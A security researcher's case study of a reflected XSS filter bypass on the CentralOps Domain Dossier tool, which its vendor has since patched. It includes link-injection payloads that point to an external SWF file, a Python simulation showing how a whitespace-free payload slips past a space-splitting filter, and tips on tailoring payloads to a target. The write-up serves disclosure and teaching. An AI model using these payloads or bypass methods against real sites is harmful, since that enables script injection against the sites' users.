Acknowledgement: I would like to thank Gavin from Hexillion Group (http://hexillion.com/) for patching this issue within a few hours.
Case Study: Recently, while working with the Domain Dossier tool on the CentralOps website (http://www.centralops.net) for my ongoing research, I came across an interesting scenario where I had to bypass some glitches in the code (or filter) to execute the XSS code. I wanted to perform link injection with the payload:
"/>&<a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a>
[Figure: Error due to injection]
The error I encountered was: "has multiple items separated by spaces, but only one input is allowed at a time. Domain Dossier will continue with"
Original: "/><a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a>
Note: I used the "/", "//" and "_" characters so that the payload would be treated as one value, and pushed it. As a result, the injection occurs as follows:
[Figure: Successful rendering of the XSS payload]
[Figure: Successful execution of the payload]
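To make the bypass concrete, here is an added simulation (not CentralOps' code, and not the author's own test harness) of the behaviour the error message describes: the field is split on whitespace and only the first item is kept. Everything in it is an assumption reconstructed from the post: the filter logic, the reflection point (a quoted input attribute, which is why the payload opens with "/>), and the whitespace-free variant of the payload, built from the note about "/" and "_" (the exact string the author submitted is not shown). The parser check uses Python's html.parser, which, like browsers, accepts "/" as a separator between a tag name and its attributes.

```python
"""Added example: simulate a whitespace-splitting input filter and show why a
payload with no whitespace survives it intact.  The filter and reflection
context are assumptions reconstructed from the post, not the real site's code."""
from html.parser import HTMLParser

# Wording quoted from the post's error message.
ERROR_TEXT = ("has multiple items separated by spaces, but only one input "
              "is allowed at a time. Domain Dossier will continue with")


def domain_dossier_filter(value):
    """Assumed filter: split on whitespace, keep the first item, and return a
    warning when the rest of the input was discarded."""
    items = value.split()
    if not items:
        return "", None
    if len(items) == 1:
        return items[0], None
    return items[0], f'"{value}" {ERROR_TEXT} "{items[0]}"'


class TagRecorder(HTMLParser):
    """Records start tags and their attributes from the reflected markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def render(reflected):
    # Assumed reflection point: the kept value is echoed inside a quoted
    # attribute, so the payload's leading "/> closes that attribute and tag.
    return f'<input type="text" value="{reflected}">'


def inject(payload):
    """Run a payload through the filter, reflect it, and parse the result."""
    kept, warning = domain_dossier_filter(payload)
    rec = TagRecorder()
    rec.feed(render(kept))
    rec.close()
    return kept, warning, rec.tags


def anchor_href(tags):
    """href of the first <a> tag the parser saw, or None if no <a> survived."""
    return next((attrs.get("href") for tag, attrs in tags if tag == "a"), None)


# The payload exactly as quoted in the post.
ORIGINAL = '"/><a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a>'
# Reconstructed (assumed) whitespace-free variant: "/" separates the tag name
# from its attribute, "_" replaces the spaces in the link text.
SPACELESS = '"/><a/href="http://0x.lv/xss.swf">Injecting_SWF_Payload</a>'

if __name__ == "__main__":
    for payload in (ORIGINAL, SPACELESS):
        kept, warning, tags = inject(payload)
        print("kept:   ", kept)
        print("warning:", warning)
        print("href:   ", anchor_href(tags))
        print()
```

Running it shows the original payload truncated to `"/><a` (the browser sees a broken tag and no link), while the whitespace-free variant passes the filter unchanged and parses as an `a` element whose href is the SWF URL. Any server-side check that tokenizes on whitespace before encoding output is vulnerable in the same way, because HTML offers several attribute separators besides the space.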
What do we learn from this?
Over the past years, I have come to feel it is more important to understand how exactly an attack is executed (by analyzing the underlying components). In my experience, one attack vector will not work in all target environments, so we have to build a new one every time. In a number of earlier scenarios, I have seen that if we tamper with the whitespace between HTML attributes and tags, the code fails to render properly in the application. But in this case study, we are required to embed additional characters in the payload so that it is passed to the application as one value.
(1) Understand the error and develop appropriate combinations to overcome the nuances (or bypass the XSS filter).
(2) Design the XSS payload according to the target environment.